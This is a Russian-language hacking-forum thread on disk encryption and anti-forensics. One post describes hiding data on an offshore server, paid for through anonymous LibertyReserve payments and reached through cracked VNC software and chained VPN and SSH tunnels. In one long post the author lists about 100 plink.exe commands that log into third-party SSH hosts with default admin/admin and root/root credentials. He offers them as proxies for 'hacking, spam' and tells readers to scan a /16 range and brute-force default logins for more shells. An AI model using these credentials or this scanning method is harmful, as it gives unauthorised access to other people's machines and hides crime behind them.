Схемы шифрования информации.

Discussion in 'Анонимность' started by black_berry, 30 Jun 2010.

  1. black_berry

    black_berry Active Member

    Joined:
    1 May 2010
    Messages:
    641
    Likes Received:
    124
    Reputations:
    31
    Может стоит попробовать старые версии DiskCryptor'а, скажем, 0.8 или вообще 0.2.6? Если результат повторится, можно попробовать отписать разработчику на форум.
     
  2. Steam[777]

    Steam[777] Elder - Старейшина

    Joined:
    27 Sep 2010
    Messages:
    296
    Likes Received:
    43
    Reputations:
    25
    Изначально стояла 0.9.593.106 (стабильная),версию удалось обновить до 1.0.732.111 (бета),пока компьютер был в "плачевном" состоянии, всё равно не помогло. А насчет разработчика... Я вот о чем думаю. Раз системный шифрованный диск функционировал нормально, а не монтировались диски, которые должны были подключаться после загрузки Windows - может проблема во взаимодействии DC с Win?
     
  3. black_berry

    black_berry Active Member

    Joined:
    1 May 2010
    Messages:
    641
    Likes Received:
    124
    Reputations:
    31
    Почему-то у меня ощущение, что именно из-за этой ошибки этот компьютер и попал к тебе на исследование. :)

    Не выяснили, что с ним случилось? И как это выглядело, дисковод не отображался на уровне BIOS или на уровне Windows в DC GUI?

    Видимо в первые моменты, когда был установлен DiskCryptor, DVD работал. Выясни что с ним случилось, затем попробуй провести такой же эксперимент но уже на другой машине - просто ради интереса посмотреть, как будет себя вести DC, если его установить на машину с уже неработающим DVD.

    P.S.
    ИМХО, сам смысл в автомонтировании разделов после загрузки Win полностью отсутствует, не могу понять зачем эта функция вообще реализована. По логике, те зашифрованные диски, которые не являются системными - уже второй уровень доступа, когда из Win генерируются пароли и затем эти разделы открываются.
     
  4. Steam[777]

    Steam[777] Elder - Старейшина

    Joined:
    27 Sep 2010
    Messages:
    296
    Likes Received:
    43
    Reputations:
    25
    Привод остался у меня,по возможности смоделирую ситуацию. На момент установки DC привод действительно был жив, в ОС (и, соответственно, в BIOS) был виден, лоток открывал/закрывал, но читать диски отказывался - постоянно просил вставить ему диск.

    Автомонтированием не пользовался, вторичное подключение дисков обусловлено тем, что они шифрованы с применением ключевого файла,находящегося на внешнем USB носителе. Закриптовать системный диск подобным образом не удалось - криптовал два раза, но после каждого раза запустить запустить ОС не удавалось - поэтому остановился на таком варианте.
     
  5. black_berry

    black_berry Active Member

    Joined:
    1 May 2010
    Messages:
    641
    Likes Received:
    124
    Reputations:
    31
    Было бы интересно, но к сожалению в рамках темы по контр-форензике, эксперты как правило не запускают машину пользователя и предпочитают подключать диски или снимать содержимое ОЗУ, если пользователь не успеет выдернуть шнур из блока питания. Возможно, они могут запустить машину пользователя в исключительных случаях (например, когда пароль на зашифрованный раздел привязан генератором к физическим характеристикам данного ПК). В любом случае, пока мы не знаем точно пойдут ли они на исключительные меры по запуску машины пользователя, в которой могут быть установлены "ловушки", "логические бомбы" и т.д., когда им потребуется получить пароль на зашифрованный раздел. Либо будет интересно посмотреть, как они попробуют сэмулировать эти физические характеристики, даже обладая исходным кодом генератора.

    Твой вариант интересен, но возможно может быть использован только когда эксперт решится запустить машину пользователя. А когда запустит, особенно если привязка на генерируемом пароле была к серийному номеру и характеристикам навернувшегося CD\DVD-дисковода - парнишка скорее всего обломается. Единственный минус - сам владелец потом не сможет получить информацию с зашифрованных дисков\разделов, если не успел сохранить зашифрованные версии паролей на внешних носителях (хостинг\VPS\файловое хранилище в Интернет, другие компьютеры, "законсервированные" CD\DVD-диски и т.д.)
     
    #65 black_berry, 8 Jul 2011
    Last edited: 9 Jul 2011
  6. black_berry

    black_berry Active Member

    Joined:
    1 May 2010
    Messages:
    641
    Likes Received:
    124
    Reputations:
    31
    Далее будет описана одна из возможных схем реализации защиты критической информации от противника в лице "оборотней в погонах". Предположим, на вашу фирму от продажного чиновника поступил заказ в местный Отдел "К" - ликвидировать организацию любой ценой в рамках законодательства, прицепившись к нелицензионному Windows, и если вы не начнете платить "дань" - заказать оперативникам найти на ваших дисках нелицензионное ПО на сумму, превышающую 50.000 рублей, что грозит в свою очередь уголовной ответственностью. Чтобы заставить организацию платить "дань", продажный государственный чиновник должен обладать информацией о всех проводимых в организации финансовых мероприятиях, чтобы знать каким объемом финансовых средств вы располагаете и сколько у вас можно "отжимать" каждый месяц в обмен на бездействие купленных им сотрудников Отдела "К", а если вы не будете платить - то либо с помощью продажных и купленных оперативников из "К" сфабриковать дело до уровня уголовного по факту наличия "пиратского" ПО, либо с помощью ОБЭП представить вашу организацию как мошенническую, использующую для своей работы различные финансовые махинации, в том числе сфабриковать статью "Уклонение от уплаты налогов". Защититься от продажной жадной власти и "оборотней в погонах" может помочь удаленное хранение критической информации на VPS\VDS в третьей стране. Если организация обладает достаточными финансовыми возможностями, лучшим выходом была бы покупка полноценного VDS-сервера с мощной конфигурацией. Купленный VDS-сервер, в отличие от VPS, обладает гораздо большими возможностями в вопросах индивидуальной конфигурации, установки собственных программ и приложений, требующих в том числе значительных ресурсов процессора и большого объема оперативной памяти. В узких кругах, такой выделенный сервер называют "Offshore Dedicated Server", который находится как правило в таких странах, как Голландия, Панама, Мексика, Индонезия, Япония, Албания, Грузия и других странах, которые обладают лояльностю в политических отношениях с Соединенными Штатами Америки. Гораздо лучшим вариантом была бы покупка VDS на островах, скажем, остров Диего Гарсия, Каймановые Острова, Острова Сент-Киттс и Невис, Британские Вирджинские Острова могли бы являться неплохим местом для размещения информации вашей организации. В общем и целом, аксиомой может служить следующее утверждение - сложность фабрикации уголовного дела продажными следователями прямо-пропорциональна удаленности вашего выделенного сервера от территории Российской Федерации, при этом существуют некоторые страны, с которыми Российская Федерация не подписала договора о сотрудничестве правоохранительных органов, такие как, напимер, Канада. Уровень взаимоотношений в данном случае регулируется Российским Бюро Интерпола, который как правило рассматривает запросы МВД России достаточно досканально и при случае очень легко сможет обнаружить предвзятость и заинтересованность в проведении оперативных мероприятий, особенно если оперативные действия продажных следователей "К" проводятся слишком активно, в чем определенным образом усматривается заинтересованность некоторых политических кругов Российской Федерации в ликвидации вашей организации как ненужного конкурента монополистов.

    Следует заметить, что покупку виртуального выделенного сервера VDS необходимо использовать с помощью анонимной системы оплаты LibertyReserve, т.к. как внутрироссийские, так и международные транзакции с использованием абсолютно всех российских платежных систем полностью контролируются и логируются, при этом в базу данных записывается практически все: дата и время оплаты, IP-адрес отправителя и наименование фирмы-получателя финансовых средств, номер электронного кошелька и т.д. Таким образом, легко становится выйти на истинного покупателя, т.к. все российские платежные системы ведут мониторинг всех поступающих запросов на регистрацию платежных аккаунтов, и если служба безопаности платежной системы видит то, что кажется ей подозрительным, она может с легкостью заблокировать любой электронный кошелек. То же самое касается на первый взгляд "абузоустойчивой" системы QIWI-кошелек, где записывается IP-адрес, с которого была отправлена заявка на регистрацию QIWI-кошелька, дата и время подачи заявки на регистрацию QIWI-кошелька и все последующие действия с использованием QIWI-кошелька. Возможности и способы пополнения LibertyReserve аккаунта остаются за рамками данной статьи. Следует заметить, что все операции по предварительной регистрации аккаунта LibertyReserve и всех дальнейших доступов к нему, проведению всех платежей следует осуществлять через связку "Зарубежный VPN + двойной перекрывающий SSH-туннель". Под понятием "зарубежный VPN" подразумевается VPN-аккаунт, купленный у зарубежного продавца с использованием бесплатного VPN-доступа. В дальнейшем, организация тройного шифрования VPN+2SSH легко реализуется с помощью программы SocksCAP (соксифицированный консольный SSH-клиент с параметрами командной строки, настроенный на ранее запущенный апстримовый SSH-туннель). При этом, если вы используете данную связку на сайте, где есть возможность использования SSL, получается квадро-шифрованный доступ.

    В целях обеспечения дополнительной безопасности выделенного сервера, после регистрации анонимного аккаунта LibertyReserve необходимо приобрести у зарубежного продавца с использованием данной платежной системы анонимный VPN-аккаунт с выделенным IP-адресом в стране, отличной от локации выделенного сервера. При этом желательно, если это будет не стандартные протоколы шифрования PPTP\L2TP, а OpenVPN с выделенным IP. Если позволяют финансовые возможности, можно купить несколько аккаунтов OpenVPN с выделенными IP-адресами из разных стран, которые в дальнейшем будут использованы для подключения к выделенному серверу.

    После покупки VDS следует в первую очередь установить на него взломанную версию VNC Enterprise, позволяющую реализовать зашифрованное подключение до VDS с возможность передачи файлов. После этого можно начать стадию организации защиты сервера. В принципе, если рассматривать VDS с установленным на нем Windows 2003 Server, то схема защиты мало отличается от схемы защиты стандартной домашней станции, поэтому читателю этой статьи достаточно перечитать всю тему "Схемы шифрования информации" и увидеть, что точно такими же способами, с незначительными исключениями, можно защитить и удаленный выделенный сервер. Далее я постараюсь описать процесс защиты сервера по порядку, после того как вами уже был установлен взломанный VNC Enterprise и на стороне сервера была выбрана опция шифрования Maximum:

    1) установка DiskCryptor любой версии, начиная с 0.2.6
    2) шифрование всего диска виртуального сервера с задаванием строки запроса пароля под видом ошибочного системного сообщения, например "NTLDR is missing", пароль запоминается
    3) заливка, установка и настройка на выделенном сервере антивируса и файрволла
    4) заливка генератора паролей
    5) заливка нескольких бесплатных криптографических программ, среди которых должны быть программы как для создания криптоконтейнеров (рекомендуется FreeOTFE или CrossCrypt), так и для шифрования отдельных файлов и папок
    6) создание криптоконтейнера с использованием FreeOTFE размером, превышающим размер созданного в дальнейшем диска виртуальной машины; пароли и ключи для криптоконтейнера могут быть созданы в том числе с использованием генератора псевдопроизвольных паролей, исполняемый файл которого должен находиться на RAM-диске (п. 8)
    7) установка программы для виртуализации системы (виртуальная машина) с последующей записью файла диска виртуальной машины внутрь ранее созданного п. 6 криптоконтейнера; шифрование диска виртуальной машины DiskCryptor'ом
    8) установка программы для создания виртуального RAM-диска размером, соответствующим размеру отправляемой в дальнейшем информации; в дальнейшем к нему будет открыт доступ из виртуальной машины и именно на него будет осуществляться запись информации, которая в дальнейшем будет передана в зашифрованную виртуальную машину
    9) проверка на постоянную работу вышеприведенной конфигурации; необходимо несколько раз перезагрузить выделенный сервер и попытаться каждый раз выполнить действия по конечному доступу к виртуальной машине, если в течение нескольких перезагрузок результат будет успешным, значит система работает
    10) заливка на сервер программы установки OpenVPN-соединений, аккаунты которых ранее были куплены с использованием LibertyReserve; активация купленных аккаунтов, при этом при подключении по OpenVPN-каналу адрес вашего выделенного сервера автоматически сменится на выделенный IP-адрес купленного вами OpenVPN-доступа, соединение по VNC отключится и вам будет необходимо изменить в настройках VNC-клиента адрес доступа
    11) установка на выделенный сервер программы для блокировки экрана, такой как LockMyPC, активируемую с использованием комбинаций "горячих" клавищ
    12) установка на выделенный сервер программы для безвозвратного удаления информации, например East-Tec Eraser

    Доступ на VDS по VNC необходимо осуществлять с использованием купленного с помощью анонимной платежной системы OpenVPN-аккаунта + перекрывающий анонимный сбрученный SSH-туннель. Настройка доступа через SOCKS5-сервер в коммерческом взломанном VNC-клиенте имеется.

    В дальнейшем, можно периодически менять адреса подключения к серверу, переключаясь между различными выделенными IP-адресами OpenVPN-аккаунтов.

    Данная схема относительно надежна, однако если у читателей возникнут конструктивные критические замечания, я всегда буду рад выслушать их и внести дополнения в существующую схему. Если у вас появятся вопросы по данной схеме, просьба отписываться в эту тему, либо в личные сообщения.
     
    #66 black_berry, 29 Jul 2011
    Last edited: 29 Jul 2011
  7. Steam[777]

    Steam[777] Elder - Старейшина

    Joined:
    27 Sep 2010
    Messages:
    296
    Likes Received:
    43
    Reputations:
    25
    Немного поправлю.
    Уголовная ответственность по ст.162 ч.2 УК РФ наступает при использовании ПО стоимостью более 50 000 рублей
     
  8. black_berry

    black_berry Active Member

    Joined:
    1 May 2010
    Messages:
    641
    Likes Received:
    124
    Reputations:
    31
    Немного поторопился со "спасибо". Во второй раз пересмотрел твой ответ - с какой стати ты про 162-ую, "Разбой", речь ведешь, когда фактическая суть основной работы "К"-шников - 146-ая, "Нарушение авторских прав".

    "2. Разбой, совершенный группой лиц по предварительному сговору, а равно с применением оружия или предметов, используемых в качестве оружия"

    соответственно может наказываться лишением свободы на срок до десяти лет со штрафом в размере до одного миллиона рублей или в размере заработной платы или иного дохода осужденного за период до пяти лет либо без такового и с ограничением свободы на срок до двух лет либо без такового.

    Не вижу никакой связи с темой по защите информации.
     
    #68 black_berry, 29 Jul 2011
    Last edited: 29 Jul 2011
  9. black_berry

    black_berry Active Member

    Joined:
    1 May 2010
    Messages:
    641
    Likes Received:
    124
    Reputations:
    31
    Немного халявы.

    Обращаясь к предыдущим страницам моей темы, читатель вероятнее всего заметил то, что я неоднократно упоминал SSH-туннели как средство, используемое для обхода логирования траффика со стороны администратора VPN-сервера, которым вы пользуетесь. Отсюда следует, что используя перекрывающий SSH-туннель, можно использовать сервер, купленный у VPN-конторы за 5 или 7 долларов в месяц, не опасаясь прочтения логов. Тем самым, заверения самих продавцов VPN-сервисов о том, что они не ведут логи автоматически теряют смысл. Некоторые VPN-продавцы, ссылаясь на "отсутствие логов", в том числе объясняют многократно завышенные цены на их услуги по сравнению с зарубежными продавцами, где средняя стоимость пакета VPN составляет около 12 долларов в месяц. Аналогично человеку под ником fl00der, я занимаюсь поиском подобных SSH-туннелей из различных стран. Сейчас у меня скопилось такое количество SSH-туннелей из различных регионов мира, что мне в буквальном смысле слова стало некуда их девать - покупателей нет, бизнес не идет, туннели накапливаются с каждым днем. Поэтому я хотел бы поделиться с пользователями Античата малой частью того, что мне удалось найти.

    Ознакомиться с установкой и настройкой SSH-туннеля можно из темы fl00der'а по следующей ссылке: https://forum.antichat.net/thread264357.html

    Вкратце: необходимо создать BAT-файл, затем прописать туда команду доступа к SSH-серверу, после чего поместить в папку с данным BAT-файлом консонльный вариант PuTTy - plink.exe. После этого, смотрим на форвард-порт, указанный в параметрах командной строки, в данном случае адресация осуществляется на порт 8089, его и нужно вводить в браузере как порт для прокси. При установке в браузере прокси, нужно прописать адрес 127.0.0.1 и порт, как уже было замечено, 8089, указав перед этим тип прокси SOCKS5. Для использования DNS-серверов из страны, SSH-туннель которой используется, необходимо в браузере FireFox ввести в строку адреса about:config, после чего подтвердить изменение настроек. Затем, в строке Filter необходимо прописать строку network.proxy.socks_remote_dns, после чего щелкнуть один раз по найденному значению, изменив значение с false на true. После этого необходимо перезагрузить FireFox и снова подключиться к туннелю, затем зайти на whoer.net, где вместо DNS-сервера вашей страны или VPN-сервера будет показан DNS страны SSH-туннеля.

    Далее будет представлен список туннелей из 2-х регионов мира: Острова Сент-Киттс и Невис и Доминика (не путать с Доминиканской Республикой). Сколько они проживут, я не знаю - возможно, несколько часов или минут, а возможно и несколько месяцев. Вероятно, вам эти туннели могут пригодиться больше, чем мне. Оговорюсь сразу - туннели исключительно для разовых операций (взлом, спам, хак и т.д.) и категорически не рекомендуется заходить с использованием этих туннелей на персональные аккаунты форумов, чатов, е-мейлов, если сам сайт не поддерживает HTTPS.

    Список туннелей будет периодически обновляться.


    [ОСТРОВА СЕНТ-КИТТС и НЕВИС]

    plink.exe -ssh 205.217.224.103 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 205.217.224.113 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 205.217.224.121 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 205.217.224.144 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 205.217.224.147 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 205.217.224.153 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 205.217.224.170 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 205.217.224.181 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 205.217.224.57 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 205.217.224.82 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 205.217.225.153 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 205.217.225.221 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 205.217.225.30 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 205.217.225.54 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 205.217.225.7 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 205.217.226.5 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 209.59.83.195 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 209.59.83.214 -C -N -l admin -pw admin -D 8089 -v


    [ДОМИНИКА]

    plink.exe -ssh 209.59.104.15 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 209.59.104.17 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 209.59.104.20 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 209.59.104.2 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 209.59.104.6 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 209.59.104.7 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 209.59.104.12 -C -N -l admin -pw admin -D 8089 -v


    [БАХРЕЙН]

    plink.exe -ssh 193.188.101.94 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 193.188.108.195 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 217.17.237.248 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 77.69.190.13 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 88.201.31.141 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 193.188.101.69 -C -N -l admin -pw admin -D 8089 -v


    [БОЛИВИЯ]

    plink.exe -ssh 200.87.120.171 -C -N -l root -pw root -D 8089 -v

    plink.exe -ssh 200.87.158.210 -C -N -l admin -pw admin -D 8089 -v


    [МАЛЬДИВЫ]

    plink.exe -ssh 123.176.10.230 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 123.176.31.14 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 123.176.4.45 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 123.176.4.46 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 123.176.4.56 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 124.195.203.195 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 203.104.29.158 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 203.104.28.18 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 203.104.29.156 -C -N -l admin -pw admin -D 8089 -v


    [АЛБАНИЯ]

    plink.exe -ssh 77.242.22.35 -C -N -l admin -pw root -D 8089 -v

    plink.exe -ssh 95.107.160.114 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 95.107.160.73 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 95.107.160.74 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 95.107.161.250 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 95.107.196.145 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 95.107.196.229 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 95.107.224.153 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 95.107.224.162 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 95.107.225.107 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 95.107.226.83 -C -N -l admin -pw admin -D 8089 -v


    [РЕСПУБЛИКА БОТСВАНА (АФРИКА)

    plink.exe -ssh 196.45.166.92 -C -N -l admin -pw admin -D 8089 -v


    [БРУНЕЯ ДАРУССАЛАМ (АФРИКА)]

    plink.exe -ssh 61.6.252.212 -C -N -l root -pw admin -D 8089 -v


    [МАЛАЙЗИЯ]

    plink.exe -ssh 202.171.45.250 -C -N -l admin -pw admin -D 8088 -v


    [ОБЪЕДИНЕННОЕ ВООРУЖЕННОЕ КОМАНДОВАНИЕ СИЛ ТИХООКЕАНСКОГО РЕГИОНА, А ТАКЖЕ ОБЪЕДИНЕННОЕ ВООРУЖЕННОЕ КОМАНДОВАНИЕ СИЛ ЕВРОПЫ, КАНАДЫ И БЛИЖНЕГО ВОСТОКА США (ВЕРОЯТНО, HONEYSPOT СИСТЕМЫ ECHELON, ОСТРОВ DIEGO GARCIA, ОСНОВНАЯ БАЗА ECHELON)

    Предположительно, абузоустойчивая система с логированием траффика и вскрытием SSL.

    plink.exe -ssh 203.83.48.93 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 203.83.48.104 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 203.83.48.105 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 203.83.48.106 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 203.83.48.109 -C -N -l admin -pw admin -D 8089 -v


    [КОСТА-РИКА]

    plink.exe -ssh 186.15.48.119 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 186.15.51.141 -C -N -l admin -pw admin -D 8089 -v


    [НОВАЯ ЗЕЛАНДИЯ]

    plink.exe -ssh 119.224.113.154 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 123.100.81.48 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 123.255.47.107 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 156.62.46.200 -C -N -l root -pw admin -D 8089 -v

    plink.exe -ssh 202.37.78.71 -C -N -l root -pw root -D 8089 -v

    plink.exe -ssh 202.127.10.243 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 210.48.29.186 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 210.48.82.148 -C -N -l admin -pw admin -D 8089 -v


    [БЕЛАРУСЬ]

    plink.exe -ssh 80.94.226.118 -C -N -l admin -pw admin -D 8089 -v


    [ЧИЛИ]

    plink.exe -ssh 200.6.123.30 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 200.71.194.86 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 200.104.150.51 -C -N -l root -pw root
    -D 8089 -v

    plink.exe -ssh 200.113.115.86 -C -N -l admin -pw admin
    -D 8089 -v

    plink.exe -ssh 200.120.5.45 -C -N -l root -pw root
    -D 8089 -v

    plink.exe -ssh 201.214.80.28 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 201.238.234.52 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 201.239.180.111 -C -N -l root -pw admin -D 8089 -v


    [КОЛУМБИЯ]

    plink.exe -ssh 200.35.35.106 -C -N -l admin -pw admin
    -D 8089 -v

    plink.exe -ssh 200.75.72.196 -C -N -l admin -pw admin
    -D 8089 -v


    [МЕКСИКА]

    plink.exe -ssh 200.79.66.188 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 200.94.71.130 -C -N -l admin -pw admin
    -D 8089 -v

    plink.exe -ssh 200.94.71.131 -C -N -l admin -pw admin
    -D 8089 -v

    plink.exe -ssh 200.94.71.132 -C -N -l admin -pw admin
    -D 8089 -v

    plink.exe -ssh 200.94.71.133 -C -N -l admin -pw admin
    -D 8089 -v

    plink.exe -ssh 200.94.71.134 -C -N -l admin -pw admin
    -D 8089 -v

    plink.exe -ssh 200.94.71.135 -C -N -l admin -pw admin
    -D 8089 -v

    plink.exe -ssh 200.94.107.106 -C -N -l admin -pw root
    -D 8089 -v


    [ГРУЗИЯ]

    plink.exe -ssh 77.92.242.140 -C -N -l root -pw admin -D 8089 -v

    plink.exe -ssh 92.241.79.126 -C -N -l root -pw admin -D 8089 -v

    plink.exe -ssh 95.137.156.199 -C -N -l root -pw root -D
    8089 -v

    plink.exe -ssh 188.169.148.137 -C -N -l root -pw admin -D 8089 -v


    [ОБЪЕДИНЕННОЕ КОМАНДОВАНИЕ ВООРУЖЕННЫХ СИЛ АТЛАНТИКИ И БЛИЖНЕВОСТОЧНОГО РЕГИОНА (HONEYSPOT СИСТЕМЫ ECHELON, ВЕСЬ ТРАФФИК ЛОГИРУЕТСЯ, ВОЕННЫЙ ДИАПАЗОН, АБУЗОУСТОЙЧИВАЯ СИСТЕМА ДЛЯ ВЗЛОМОВ, МОШЕННИЧЕСТВА ВНЕ ТЕРРИТОРИИ США]


    plink.exe -ssh 203.83.48.152 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 203.83.48.154 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 203.83.48.157 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 203.83.48.169 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 203.83.48.169 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 203.83.48.170 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 203.83.48.174 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 203.83.48.176 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 203.83.48.127 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 203.83.48.128 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 203.83.48.130 -C -N -l admin -pw admin -D 8089 -v

    Для получения большего количества шеллов сканируйте диапазон 203.83.0.0-203.83.255.255 на наличие открытых 22-х портов и стандартных логинов\паролей "admin\admin", "root\root" и т.д. Если в результате сканирования будут найдены открытые порты, пробуйте прямой перебор.


    [ИРАК]

    plink.exe -ssh 62.201.217.18 -C -N -l admin -pw root -D8089 -v


    [ЛАТВИЯ]

    plink.exe -ssh 89.248.91.242 -C -N -l root -pw root -D 8089 -v

    plink.exe -ssh 91.90.231.229 -C -N -l root -pw root -D 8089 -v

    plink.exe -ssh 91.90.245.185 -C -N -l root -pw root -D 8089 -v

    plink.exe -ssh 93.177.237.68 -C -N -l root -pw root -D 8089 -v

    plink.exe -ssh 93.177.238.147 -C -N -l root -pw root -D 8089 -v

    plink.exe -ssh 94.100.7.10 -C -N -l root -pw root -D 8089 -v

    plink.exe -ssh 159.148.10.219 -C -N -l root -pw admin -D 8089 -v

    plink.exe -ssh 159.148.124.151 -C -N -l root -pw root -D 8089 -v


    [ПУЭРТО-РИКО]

    plink.exe -ssh 66.231.168.182 -C -N -l admin -pw admin-D 8089 -v

    plink.exe -ssh 76.76.198.12 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 196.12.186.182 -C -N -l admin -pw admi -D 8089 -v

    plink.exe -ssh 196.32.155.134 -C -N -l admin -pw admi -D 8089 -v

    plink.exe -ssh 200.50.27.2 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 204.15.149.34 -C -N -l admin -pw admi -D 8089 -v


    [КИТАЙ]

    plink.exe -ssh 58.32.233.34 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 58.53.131.182 -C -N -l admin -pw admin -D 8089 -v


    [ФРАНЦИЯ]

    plink.exe -ssh 212.51.174.146 -C -N -l admin -pw admin -D 8086 -v

    plink.exe -ssh 212.198.110.119 -C -N -l admin -pw admin -D 8088 -v

    plink.exe -ssh 213.111.20.64 -C -N -l admin -pw admin -D 8088 -v


    [КИПP]

    plink.exe -ssh 46.251.98.162 -C -N -l admin -pw admin -D 8089 -v


    [ИРЛАНДИЯ]

    plink.exe -ssh 46.7.250.38 -C -N -l root -pw root -D 8089 -v

    plink.exe -ssh 83.71.217.138 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 83.71.232.210 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 86.47.164.98 -C -N -l admin -pw admin -D 8089 -v

    plink.exe -ssh 86.47.165.146 -C -N -l admin -pw admin -D 8089 -v


    Всего доброго вам. С наилучшими пожеланиями, из:

    [​IMG]
     
    #69 black_berry, 8 Aug 2011
    Last edited: 18 Aug 2011
    1 person likes this.
  10. black_berry

    black_berry Active Member

    Joined:
    1 May 2010
    Messages:
    641
    Likes Received:
    124
    Reputations:
    31
    cr_cascade

    [​IMG]

    Данная программа предназначена для шифрования текста, файлов и папок. Используемые алгоритмы шифрования:

    1) TEA
    2) Rijndael
    3) Twofish
    4) RC4
    5) Blowfish
    6) Skipjack
    7) DES
    8) GOST


    В особенности программы входит возможность последовательного шифрования несколькими шифрами подряд. Для каждого нового шифра будет использован отдельный уникальный пароль, состоящий из 512 символов. Ключевой особенностью программы, отличающей ее от предыдущих пред-релизов заключается в возможности привязки ключа шифрования к аппаратной и программной конфигурации ПК. Таким образом, даже зная верный пароль, будет невозможно расшифровать исходные данные на другом компьютере. В программу включена возможность привязки к отдельному файлу или списку файлов. Визуально список выбранных для привязки файлов не отображается в интерфейсе программы также, как не отображается и вводимый пароль.

    Последовательность использования программы:

    1) выберите алгоритм шифрования из списка
    2) в текстовое поле [ password ] введите ваш пароль
    3) если вы хотите использовать привязку к файлам, нажмите кнопку Add file, затем выберите в диалоговом окне нужный файл
    4) если вы хотите использовать привязку к программным или аппаратным характеристикам компьютера, нажмите кнопку Other options
    5) нажмите кнопку Add algorithm и дождитесь, пока выбранный алгоритм появится в списке

    Примечания:

    Если вы хотите использовать несколько алгоритмов, вам необходимо будет повторить данную процедуру для каждого нового алгоритма.Привязка к программной и аппаратной конфигурации ПК (кнопка Other options) позволяет привязать пароль выбранного алгоритма к:

    1) серийному номеру и производителю BIOS
    2) серийному номеру и производителю материнской платы
    3) серийному номеру жесткого диска, на котором находится система
    4) серийному номеру и производителю процессора
    5) серийному номеру подключенного на тот момент USB-устройства
    6) текущим характеристикам операционной системы
    7) объему и типу физической памяти
    8) программно-аппаратным характеристикам аудио\видео-контроллеров, а также текущему расширению экрана и пр.

